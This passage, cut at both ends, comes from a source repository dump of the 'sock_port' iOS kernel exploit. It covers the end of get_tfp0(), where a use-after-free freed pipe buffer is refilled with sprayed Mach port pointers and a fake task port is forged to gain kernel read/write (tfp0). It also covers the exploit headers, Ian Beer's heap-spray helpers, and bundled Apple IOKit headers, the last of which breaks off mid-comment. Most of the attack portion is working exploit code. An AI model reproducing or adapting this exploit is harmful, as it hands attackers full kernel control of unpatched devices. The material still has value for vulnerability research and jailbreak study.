free the first pipe buffer\n    ret = free_via_uaf(pipe_buffer);\n    if (ret) {\n        printf(\"ERROR: SockPort: failed to free pipe buffer\\n\");\n        goto err;\n    }\n\n    // reallocate it while filling it with a mach message containing send rights to our target port\n    mach_port_t p = MACH_PORT_NULL;\n    for (int i = 0; i < 10000; i++) {\n        \n        // pipe is 0x10000 bytes so make 0x10000/8 pointers and save result as we'll use later\n        p = fill_kalloc_with_port_pointer(target, 0x10000/8, MACH_MSG_TYPE_COPY_SEND);\n        \n        // check if spraying worked by reading first 8 bytes\n        uint64_t addr;\n        read(fds[0], &addr, 8);\n        if (addr == target_addr) { // if we see the address of our port, it worked\n            break;\n        }\n        write(fds[1], &addr, 8); // reset buffer position\n        \n        mach_port_destroy(mach_task_self(), p); // spraying didn't work, so free port\n        p = MACH_PORT_NULL;\n    }\n\n    if (!p) {\n        printf(\"ERROR: SockPort: spraying failed!\");\n        goto err;\n    }\n    \n    if (SMAP) {\n        // spraying worked, now the pipe buffer is filled with pointers to our target port\n        // overwrite the first pointer with our second pipe buffer, which contains the fake port\n        write(fds[1], &port_pipe_buffer, 8);\n    }\n    else {\n        write(fds[1], &fakeport, 8);\n    }\n    \n    // receive the message from fill_kalloc_with_port_pointers back, since that message contains a send right and we overwrote the pointer of the first port, we now get a send right to the fake port!\n    struct ool_msg *msg = malloc(0x1000);\n    ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, 0x1000, p, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n    if (ret) {\n        free(msg);\n        printf(\"ERROR: SockPort: mach_msg() failed: %d (%s)\\n\", ret, mach_error_string(ret));\n        goto err;\n    }\n    \n    mach_port_t *received_ports = msg->ool_ports.address;\n    mach_port_t 
our_port = received_ports[0]; // fake port!\n    free(msg);\n    \n    uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n    \n#define kr32(addr, value)\\\n    if (SMAP) {\\\n        read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\\\n    }\\\n    *read_addr_ptr = addr - koffset(KSTRUCT_OFFSET_PROC_PID);\\\n    if (SMAP) {\\\n        write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\\\n    }\\\n    value = 0x0;\\\n    ret = pid_for_task(our_port, (int *)&value);\n    \n    uint32_t read64_tmp;\n#define kr64(addr, value)\\\n    kr32(addr + 0x4, read64_tmp);\\\n    kr32(addr, value);\\\n    value = value | ((uint64_t)read64_tmp << 32)\n    \n    uint64_t struct_task;\n    kr64(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), struct_task);\n    if (!struct_task) {\n        printf(\"ERROR: SockPort: kernel read failed!\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: READING VIA FAKE PORT WORKED? 
0x%llx\\n\", struct_task);\n    printf(\"SockPort: Let's steal that kernel task port!\\n\");\n    \n    // tfp0!\n    \n    uint64_t kernel_vm_map = 0;\n    \n    while (struct_task != 0) {\n        uint64_t bsd_info;\n        kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO), bsd_info);\n        if (!bsd_info) {\n            printf(\"SockPort: kernel read failed!\\n\");\n            goto err;\n        }\n        \n        uint32_t pid;\n        kr32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID), pid);\n        \n        if (pid == 0) {\n            uint64_t vm_map;\n            kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP), vm_map);\n            if (!vm_map) {\n                printf(\"SockPort: kernel read failed!\\n\");\n                goto err;\n            }\n            \n            kernel_vm_map = vm_map;\n            break;\n        }\n        \n        kr64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV), struct_task);\n    }\n    \n    if (!kernel_vm_map) {\n        printf(\"SockPort: failed to find kernel's vm_map\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: kernel_vm_map: 0x%llx\\n\", kernel_vm_map);\n    \n    read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\n    \n    fake_task->lock.data = 0x0;\n    fake_task->lock.type = 0x22;\n    fake_task->ref_count = 100;\n    fake_task->active = 1;\n    fake_task->map = kernel_vm_map;\n    *(uint32_t *)((uint64_t)fake_task + koffset(KSTRUCT_OFFSET_TASK_ITK_SELF)) = 1;\n\n    if (SMAP) {\n        write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n    }\n    \n    init_kernel_memory(our_port);\n    \n    uint64_t addr = kalloc(8);\n    if (!addr) {\n        printf(\"SockPort: seems like tfp0 port didn't work?\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: allocated: 0x%llx\\n\", addr);\n    wk64(addr, 0x4141414141414141);\n    uint64_t readb = rk64(addr);\n    kfree(addr, 8);\n    printf(\"SockPort: read back: 0x%llx\\n\", readb);\n    \n 
   if (readb != 0x4141414141414141) {\n        printf(\"read back value didn't match\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: creating safer port\\n\");\n    \n    mach_port_t new_tfp0 = new_port();\n    if (!new_tfp0) {\n        printf(\"SockPort: failed to allocate new tfp0 port\\n\");\n        goto err;\n    }\n    \n    uint64_t new_addr = find_port(new_tfp0, self_port_addr);\n    if (!new_addr) {\n        printf(\"SockPort: failed to find new tfp0 port address\\n\");\n        goto err;\n    }\n    \n    uint64_t faketask = kalloc(0x600);\n    if (!faketask) {\n        printf(\"SockPort: failed to kalloc faketask\\n\");\n        goto err;\n    }\n    \n    kwrite(faketask, fake_task, 0x600);\n    fakeport->ip_kobject = faketask;\n    \n    kwrite(new_addr, (const void*)fakeport, sizeof(kport_t));\n    \n    printf(\"SockPort: testing new tfp0 port\\n\");\n    \n    init_kernel_memory(new_tfp0);\n    \n    addr = kalloc(8);\n    if (!addr) {\n        printf(\"SockPort: seems like the new tfp0 port didn't work?\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: tfp0: 0x%x\\n\", new_tfp0);\n    printf(\"SockPort: allocated: 0x%llx\\n\", addr);\n    wk64(addr, 0x4141414141414141);\n    readb = rk64(addr);\n    kfree(addr, 8);\n    printf(\"SockPort: read back: 0x%llx\\n\", readb);\n    \n    if (readb != 0x4141414141414141) {\n        printf(\"SockPort: read back value didn't match\\n\");\n        goto err;\n    }\n    \n    // clean up port\n    current_task = rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    uint64_t task_addr = rk64(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n    uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n    \n    uint32_t port_index = our_port >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n    \n    wk32(is_table + (port_index * 
sizeof_ipc_entry_t) + 8, 0);\n    wk64(is_table + (port_index * sizeof_ipc_entry_t), 0);\n\n    wk64(fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER), 0); // freed already via mach_msg()\n    \n    if (fds[0] > 0)  close(fds[0]);\n    if (fds[1] > 0)  close(fds[1]);\n    if (port_fds[0] > 0)  close(port_fds[0]);\n    if (port_fds[1] > 0)  close(port_fds[1]);\n    \n    free((void *)fakeport);\n    deinit_IOSurface();\n    return new_tfp0;\n    \nerr:\n    if (port_fds[0] > 0)  close(port_fds[0]);\n    if (port_fds[1] > 0)  close(port_fds[1]);\n    \n    deinit_IOSurface();\n    return MACH_PORT_NULL;\n}\n"
  },
  {
    "path": "Exploits/sock_port/exploit.h",
    "content": "//\n//  exploit.h\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef exploit_h\n#define exploit_h\n\n\n#include <stdio.h>\n#include <unistd.h>\n#include <errno.h>\n#include <netinet/in.h>\n#include <mach/mach.h>\n#include <sys/mman.h>\n\n#include \"exploit_utilities.h\"\n#include \"kernel_memory.h\"\n\n#define IPV6_USE_MIN_MTU 42\n#define IPV6_PKTINFO 46\n#define IPV6_PREFER_TEMPADDR 63\nextern uint64_t current_task;\nextern uint64_t kernel_slide;\nstruct route_in6 {\n    struct rtentry *ro_rt;\n    struct llentry *ro_lle;\n    struct ifaddr *ro_srcia;\n    uint32_t ro_flags;\n    struct sockaddr_in6 ro_dst;\n};\n\nstruct ip6po_rhinfo {\n    struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */\n    struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */\n};\n\nstruct ip6po_nhinfo {\n    struct sockaddr *ip6po_nhi_nexthop;\n    struct route_in6 ip6po_nhi_route; /* Route to the nexthop */\n};\n\nstruct ip6_pktopts {\n    struct mbuf *ip6po_m;\n    int ip6po_hlim;\n    struct in6_pktinfo *ip6po_pktinfo;\n    struct ip6po_nhinfo ip6po_nhinfo;\n    struct ip6_hbh *ip6po_hbh;\n    struct ip6_dest *ip6po_dest1;\n    struct ip6po_rhinfo ip6po_rhinfo;\n    struct ip6_dest *ip6po_dest2;\n    int ip6po_tclass;\n    int ip6po_minmtu;\n    int ip6po_prefer_tempaddr;\n    int ip6po_flags;\n};\n\n#define IO_BITS_ACTIVE      0x80000000\n#define IOT_PORT            0\n#define IKOT_TASK           2\n#define IKOT_CLOCK          25\n#define IKOT_IOKIT_CONNECT  29\n\ntypedef volatile struct {\n    uint32_t ip_bits;\n    uint32_t ip_references;\n    struct {\n        uint64_t data;\n        uint64_t type;\n    } ip_lock; // spinlock\n    struct {\n        struct {\n            struct {\n                uint32_t flags;\n                uint32_t waitq_interlock;\n                uint64_t waitq_set_id;\n                uint64_t waitq_prepost_id;\n                struct {\n                   
 uint64_t next;\n                    uint64_t prev;\n                } waitq_queue;\n            } waitq;\n            uint64_t messages;\n            uint32_t seqno;\n            uint32_t receiver_name;\n            uint16_t msgcount;\n            uint16_t qlimit;\n            uint32_t pad;\n        } port;\n        uint64_t klist;\n    } ip_messages;\n    uint64_t ip_receiver;\n    uint64_t ip_kobject;\n    uint64_t ip_nsrequest;\n    uint64_t ip_pdrequest;\n    uint64_t ip_requests;\n    uint64_t ip_premsg;\n    uint64_t ip_context;\n    uint32_t ip_flags;\n    uint32_t ip_mscount;\n    uint32_t ip_srights;\n    uint32_t ip_sorights;\n} kport_t;\n\ntypedef struct {\n    struct {\n        uint64_t data;\n        uint32_t reserved : 24,\n        type     :  8;\n        uint32_t pad;\n    } lock; // mutex lock\n    uint32_t ref_count;\n    uint32_t active;\n    uint32_t halting;\n    uint32_t pad;\n    uint64_t map;\n} ktask_t;\n\n#define WQT_QUEUE               0x2\n#define _EVENT_MASK_BITS        ((sizeof(uint32_t) * 8) - 7)\n\nunion waitq_flags {\n    struct {\n        uint32_t /* flags */\n    waitq_type:2,    /* only public field */\n    waitq_fifo:1,    /* fifo wakeup policy? */\n    waitq_prepost:1, /* waitq supports prepost? */\n    waitq_irq:1,     /* waitq requires interrupts disabled */\n    waitq_isvalid:1, /* waitq structure is valid */\n    waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */\n    waitq_eventmask:_EVENT_MASK_BITS;\n    };\n    uint32_t flags;\n};\n\n\nmach_port_t get_tfp0(void);\n\n#endif /* exploit_h */\n"
  },
  {
    "path": "Exploits/sock_port/exploit_utilities.c",
    "content": "//\n//  exploit_utilities.c\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"exploit_utilities.h\"\n\n// from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {\n    mach_port_t q = MACH_PORT_NULL;\n    kern_return_t err;\n    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n    if (err != KERN_SUCCESS) {\n        printf(\"IOSurface: failed to allocate port\\n\");\n        return 0;\n    }\n    \n    mach_port_t* ports = malloc(sizeof(mach_port_t) * count);\n    for (int i = 0; i < count; i++) {\n        ports[i] = target_port;\n    }\n    \n    struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));\n    \n    msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n    msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);\n    msg->hdr.msgh_remote_port = q;\n    msg->hdr.msgh_local_port = MACH_PORT_NULL;\n    msg->hdr.msgh_id = 0x41414141;\n    \n    msg->body.msgh_descriptor_count = 1;\n    \n    msg->ool_ports.address = ports;\n    msg->ool_ports.count = count;\n    msg->ool_ports.deallocate = 0;\n    msg->ool_ports.disposition = disposition;\n    msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;\n    msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;\n    \n    err = mach_msg(&msg->hdr,\n                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n                   msg->hdr.msgh_size,\n                   0,\n                   MACH_PORT_NULL,\n                   MACH_MSG_TIMEOUT_NONE,\n                   MACH_PORT_NULL);\n    \n    if (err != KERN_SUCCESS) {\n        printf(\"IOSurface: failed to send message: %s\\n\", mach_error_string(err));\n        return MACH_PORT_NULL;\n    }\n    \n    return q;\n}\n\n// Ian Beer\nsize_t 
message_size_for_kalloc_size(size_t kalloc_size) {\n    return ((3 * kalloc_size) / 4) - 0x74;\n}\n\n// Ian Beer\nmach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) {\n    mach_port_t q = MACH_PORT_NULL;\n    kern_return_t err;\n    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n    if (err != KERN_SUCCESS) {\n        printf(\"IOSurface: failed to allocate port\\n\");\n        return MACH_PORT_NULL;\n    }\n    \n    mach_port_limits_t limits = {0};\n    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;\n    err = mach_port_set_attributes(mach_task_self(),\n                                   q,\n                                   MACH_PORT_LIMITS_INFO,\n                                   (mach_port_info_t)&limits,\n                                   MACH_PORT_LIMITS_INFO_COUNT);\n    if (err != KERN_SUCCESS) {\n        printf(\"IOSurface: failed to increase queue limit\\n\");\n        return MACH_PORT_NULL;\n    }\n    \n    mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;\n    struct simple_msg *msg = (struct simple_msg *)malloc(msg_size);\n    memset(msg, 0, sizeof(struct simple_msg));\n    memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);\n    \n    for (int i = 0; i < 256; i++) {\n        msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n        msg->hdr.msgh_size = msg_size;\n        msg->hdr.msgh_remote_port = q;\n        msg->hdr.msgh_local_port = MACH_PORT_NULL;\n        msg->hdr.msgh_id = 0x41414142;\n        \n        err = mach_msg(&msg->hdr,\n                       MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n                       msg_size,\n                       0,\n                       MACH_PORT_NULL,\n                       MACH_MSG_TIMEOUT_NONE,\n                       MACH_PORT_NULL);\n        \n        if (err != KERN_SUCCESS) {\n            printf(\"IOSurface: failed to send message %x (%d): %s\\n\", err, i, 
mach_error_string(err));\n            return MACH_PORT_NULL;\n        }\n    }\n    \n    return q;\n}\n\n// rest is from machswap\nvoid trigger_gc() {\n    const int gc_ports_cnt = 100;\n    int gc_ports_max = gc_ports_cnt;\n    mach_port_t gc_ports[gc_ports_cnt] = { 0 };\n    \n    uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024\n    uint8_t *body = (uint8_t*)malloc(body_size);\n    memset(body, 0x41, body_size);\n    \n    for (int i = 0; i < gc_ports_cnt; i++) {\n        uint64_t t0, t1;\n        \n        t0 = mach_absolute_time();\n        gc_ports[i] = send_kalloc_message(body, body_size);\n        t1 = mach_absolute_time();\n        \n        if (t1 - t0 > 1000000) {\n            printf(\"IOSurface: got gc at %d -- breaking\\n\", i);\n            gc_ports_max = i;\n            break;\n        }\n    }\n    \n    for (int i = 0; i < gc_ports_max; i++) {\n        mach_port_destroy(mach_task_self(), gc_ports[i]);\n    }\n    \n    sched_yield();\n    sleep(1);\n}\n\nmach_vm_size_t pagesize = 0;\n\nconst uint64_t IOSURFACE_CREATE_SURFACE =  0;\nconst uint64_t IOSURFACE_SET_VALUE      =  9;\nconst uint64_t IOSURFACE_GET_VALUE      = 10;\nconst uint64_t IOSURFACE_DELETE_VALUE   = 11;\n\nint init_IOSurface() {\n    kern_return_t ret = KERN_SUCCESS;\n\n    ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize);\n    printf(\"IOSurface: The page size is: 0x%llx, %s\\n\", pagesize, mach_error_string(ret));\n    if (ret != KERN_SUCCESS) {\n        printf(\"IOSurface: Failed to get page size! ret: %x %s\\n\", ret, mach_error_string(ret));\n        return ret;\n    }\n    return !IOSurface_init();\n}\n\nvoid deinit_IOSurface() {\n    IOSurface_deinit();\n}\n\nint spray_IOSurface(void *data, size_t size) {\n    return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL);\n}\n"
  },
  {
    "path": "Exploits/sock_port/exploit_utilities.h",
    "content": "//\n//  exploit_utilities.h\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef exploit_utilities_h\n#define exploit_utilities_h\n\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <errno.h>\n#include <mach/mach.h>\n#include <sched.h>\n#include \"../sock_port/include/IOKit/IOKitLib.h\"\n#include <sys/utsname.h>\n\n#include \"iosurface.h\"\n\nstruct ool_msg  {\n    mach_msg_header_t hdr;\n    mach_msg_body_t body;\n    mach_msg_ool_ports_descriptor_t ool_ports;\n};\n\nstruct simple_msg {\n    mach_msg_header_t hdr;\n    char buf[0];\n};\n\nsize_t message_size_for_kalloc_size(size_t kalloc_size);\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition);\nmach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size);\nvoid trigger_gc(void);\n\nenum {\n    kIOCFSerializeToBinary          = 0x00000001U,\n};\n\n#define kOSSerializeBinarySignature 0x000000D3U\n\nenum {\n    kOSSerializeDictionary          = 0x01000000U,\n    kOSSerializeArray               = 0x02000000U,\n    kOSSerializeSet                 = 0x03000000U,\n    kOSSerializeNumber              = 0x04000000U,\n    kOSSerializeSymbol              = 0x08000000U,\n    kOSSerializeString              = 0x09000000U,\n    kOSSerializeData                = 0x0a000000U,\n    kOSSerializeBoolean             = 0x0b000000U,\n    kOSSerializeObject              = 0x0c000000U,\n    \n    kOSSerializeTypeMask            = 0x7F000000U,\n    kOSSerializeDataMask            = 0x00FFFFFFU,\n    \n    kOSSerializeEndCollection       = 0x80000000U,\n    \n    kOSSerializeMagic               = 0x000000d3U,\n};\n\nextern mach_vm_size_t pagesize;\n\nextern const uint64_t IOSURFACE_CREATE_SURFACE;\nextern const uint64_t IOSURFACE_SET_VALUE;\nextern const uint64_t IOSURFACE_GET_VALUE;\nextern const uint64_t IOSURFACE_DELETE_VALUE;\n\nint 
init_IOSurface(void);\nvoid deinit_IOSurface(void);\nint spray_IOSurface(void *data, size_t size);\n\n#endif /* exploit_utilities_h */\n"
  },
  {
    "path": "Exploits/sock_port/include/IOKit/IOKitKeys.h",
    "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc.  All rights reserved. \n *\n * Common symbol definitions for IOKit. 
\n *\n * HISTORY\n *\n */\n\n\n#ifndef _IOKIT_IOKITKEYS_H\n#define _IOKIT_IOKITKEYS_H\n\n// properties found in the registry root\n#define kIOKitBuildVersionKey\t\t\"IOKitBuildVersion\"\n#define kIOKitDiagnosticsKey\t\t\"IOKitDiagnostics\"\n\t// a dictionary keyed by plane name\n#define kIORegistryPlanesKey\t\t\"IORegistryPlanes\"\n#define kIOCatalogueKey\t\t\t\"IOCatalogue\"\n\n// registry plane names\n#define kIOServicePlane\t\t\t\"IOService\"\n#define kIOPowerPlane\t\t\t\"IOPower\"\n#define kIODeviceTreePlane\t\t\"IODeviceTree\"\n#define kIOAudioPlane\t\t\t\"IOAudio\"\n#define kIOFireWirePlane\t\t\"IOFireWire\"\n#define kIOUSBPlane\t\t\t\"IOUSB\"\n\n// registry ID number\n#define kIORegistryEntryIDKey\t\t\"IORegistryEntryID\"\n\n// IOService class name\n#define kIOServiceClass\t\t\t\"IOService\"\n\n// IOResources class name\n#define kIOResourcesClass\t\t\"IOResources\"\n\n// IOService driver probing property names\n#define kIOClassKey\t\t\t\"IOClass\"\n#define kIOProbeScoreKey\t\t\"IOProbeScore\"\n#define kIOKitDebugKey\t\t\t\"IOKitDebug\"\n\n// IOService matching property names\n#define kIOProviderClassKey\t\t\"IOProviderClass\"\n#define kIONameMatchKey\t\t\t\"IONameMatch\"\n#define kIOPropertyMatchKey\t\t\"IOPropertyMatch\"\n#define kIOPathMatchKey\t\t\t\"IOPathMatch\"\n#define kIOLocationMatchKey\t\t\"IOLocationMatch\"\n#define kIOParentMatchKey\t\t\"IOParentMatch\"\n#define kIOResourceMatchKey\t\t\"IOResourceMatch\"\n#define kIOMatchedServiceCountKey\t\"IOMatchedServiceCountMatch\"\n\n#define kIONameMatchedKey\t\t\"IONameMatched\"\n\n#define kIOMatchCategoryKey\t\t\"IOMatchCategory\"\n#define kIODefaultMatchCategoryKey\t\"IODefaultMatchCategory\"\n\n// IOService default user client class, for loadable user clients\n#define kIOUserClientClassKey\t\t\"IOUserClientClass\"\n\n// key to find IOMappers\n#define kIOMapperIDKey\t\t\t\t\"IOMapperID\"\n\n#define kIOUserClientCrossEndianKey\t\t\"IOUserClientCrossEndian\"\n#define 
kIOUserClientCrossEndianCompatibleKey\t\"IOUserClientCrossEndianCompatible\"\n#define kIOUserClientSharedInstanceKey\t\t\"IOUserClientSharedInstance\"\n// diagnostic string describing the creating task\n#define kIOUserClientCreatorKey\t\t\"IOUserClientCreator\"\n\n// IOService notification types\n#define kIOPublishNotification\t\t\"IOServicePublish\"\n#define kIOFirstPublishNotification\t\"IOServiceFirstPublish\"\n#define kIOMatchedNotification\t\t\"IOServiceMatched\"\n#define kIOFirstMatchNotification\t\"IOServiceFirstMatch\"\n#define kIOTerminatedNotification\t\"IOServiceTerminate\"\n\n// IOService interest notification types\n#define kIOGeneralInterest\t\t\"IOGeneralInterest\"\n#define kIOBusyInterest\t\t\t\"IOBusyInterest\"\n#define kIOAppPowerStateInterest\t\"IOAppPowerStateInterest\"\n#define kIOPriorityPowerStateInterest\t\"IOPriorityPowerStateInterest\"\n\n#define kIOPlatformDeviceMessageKey     \"IOPlatformDeviceMessage\"\n\n// IOService interest notification types\n#define kIOCFPlugInTypesKey\t\t\"IOCFPlugInTypes\"\n\n// properties found in services that implement command pooling\n#define kIOCommandPoolSizeKey\t       \"IOCommandPoolSize\"          // (OSNumber)\n\n// properties found in services that have transfer constraints\n#define kIOMaximumBlockCountReadKey             \"IOMaximumBlockCountRead\"             // (OSNumber)\n#define kIOMaximumBlockCountWriteKey            \"IOMaximumBlockCountWrite\"            // (OSNumber)\n#define kIOMaximumByteCountReadKey              \"IOMaximumByteCountRead\"              // (OSNumber)\n#define kIOMaximumByteCountWriteKey             \"IOMaximumByteCountWrite\"             // (OSNumber)\n#define kIOMaximumSegmentCountReadKey           \"IOMaximumSegmentCountRead\"           // (OSNumber)\n#define kIOMaximumSegmentCountWriteKey          \"IOMaximumSegmentCountWrite\"          // (OSNumber)\n#define kIOMaximumSegmentByteCountReadKey       \"IOMaximumSegmentByteCountRead\"       // (OSNumber)\n#define 
kIOMaximumSegmentByteCountWriteKey      \"IOMaximumSegmentByteCountWrite\"      // (OSNumber)\n#define kIOMinimumSegmentAlignmentByteCountKey  \"IOMinimumSegmentAlignmentByteCount\"  // (OSNumber)\n#define kIOMaximumSegmentAddressableBitCountKey \"IOMaximumSegmentAddressableBitCount\" // (OSNumber)\n\n// properties found in services that wish to describe an icon\n//\n// IOIcon = \n// {\n//     CFBundleIdentifier   = \"com.example.driver.example\";\n//     IOBundleResourceFile = \"example.icns\";\n// };\n//\n// where IOBundleResourceFile is the filename of the resource\n\n#define kIOIconKey               \"IOIcon\"               // (OSDictionary)\n#define kIOBundleResourceFileKey \"IOBundleResourceFile\" // (OSString)\n\n#define kIOBusBadgeKey           \"IOBusBadge\"           // (OSDictionary)\n#define kIODeviceIconKey         \"IODeviceIcon\"         // (OSDictionary)\n\n// property of root that describes the machine's serial number as a string\n#define kIOPlatformSerialNumberKey\t\"IOPlatformSerialNumber\"\t// (OSString)\n\n// property of root that describes the machine's UUID as a string\n#define kIOPlatformUUIDKey\t\"IOPlatformUUID\"\t// (OSString)\n\n// IODTNVRAM property keys\n#define kIONVRAMDeletePropertyKey\t\"IONVRAM-DELETE-PROPERTY\"\n#define kIODTNVRAMPanicInfoKey\t\t\"aapl,panic-info\"\n\n// keys for complex boot information\n#define kIOBootDeviceKey          \"IOBootDevice\"\t\t// dict | array of dicts\n#define kIOBootDevicePathKey      \"IOBootDevicePath\"\t// arch-neutral OSString\n#define kIOBootDeviceSizeKey      \"IOBootDeviceSize\"\t// OSNumber of bytes\n\n// keys for OS Version information\n#define kOSBuildVersionKey\t\t\"OS Build Version\"\n\n#endif /* ! _IOKIT_IOKITKEYS_H */\n"
  },
  {
    "path": "Exploits/sock_port/include/IOKit/IOKitLib.h",
    "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * The contents of this file constitute Original Code as defined in and\n * are subject to the Apple Public Source License Version 1.1 (the\n * \"License\").  You may not use this file except in compliance with the\n * License.  Please obtain a copy of the License at\n * http://www.apple.com/publicsource and read it before using this file.\n * \n * This Original Code and all software distributed under the License are\n * distributed on an \"AS IS\" basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT.  Please see the\n * License for the specific language governing rights and limitations\n * under the License.\n * \n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n *\n */\n\n/*\n * IOKit user library\n */\n\n#ifndef _IOKIT_IOKITLIB_H\n#define _IOKIT_IOKITLIB_H\n\n#ifdef KERNEL\n#error This file is not for kernel use\n#endif\n\n#include <sys/cdefs.h>\n#include <sys/types.h>\n\n#include <mach/mach_types.h>\n#include <mach/mach_init.h>\n\n#include <CoreFoundation/CFBase.h>\n#include <CoreFoundation/CFDictionary.h>\n#include <CoreFoundation/CFRunLoop.h>\n\n#include \"IOTypes.h\"\n#include \"IOKitKeys.h\"\n\n#include \"OSMessageNotification.h\"\n\n#include <AvailabilityMacros.h>\n\n__BEGIN_DECLS\n\n/*! @header IOKitLib\nIOKitLib implements non-kernel task access to common IOKit object types - IORegistryEntry, IOService, IOIterator etc. These functions are generic - families may provide API that is more specific.<br>\nIOKitLib represents IOKit objects outside the kernel with the types io_object_t, io_registry_entry_t, io_service_t, & io_connect_t. Function names usually begin with the type of object they are compatible with - eg. 
IOObjectRelease can be used with any io_object_t. Inside the kernel, the c++ class hierarchy allows the subclasses of each object type to receive the same requests from user level clients, for example in the kernel, IOService is a subclass of IORegistryEntry, which means any of the IORegistryEntryXXX functions in IOKitLib may be used with io_service_t's as well as io_registry_t's. There are functions available to introspect the class of the kernel object which any io_object_t et al. represents.\nIOKit objects returned by all functions should be released with IOObjectRelease.\n*/\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\ntypedef struct IONotificationPort * IONotificationPortRef;\n\n\n/*! @typedef IOServiceMatchingCallback\n    @abstract Callback function to be notified of IOService publication.\n    @param refcon The refcon passed when the notification was installed.\n    @param iterator The notification iterator which now has new objects.\n*/\ntypedef void\n(*IOServiceMatchingCallback)(\n\tvoid *\t\t\trefcon,\n\tio_iterator_t\t\titerator );\n\n/*! @typedef IOServiceInterestCallback\n    @abstract Callback function to be notified of changes in state of an IOService.\n    @param refcon The refcon passed when the notification was installed.\n    @param service The IOService whose state has changed.\n    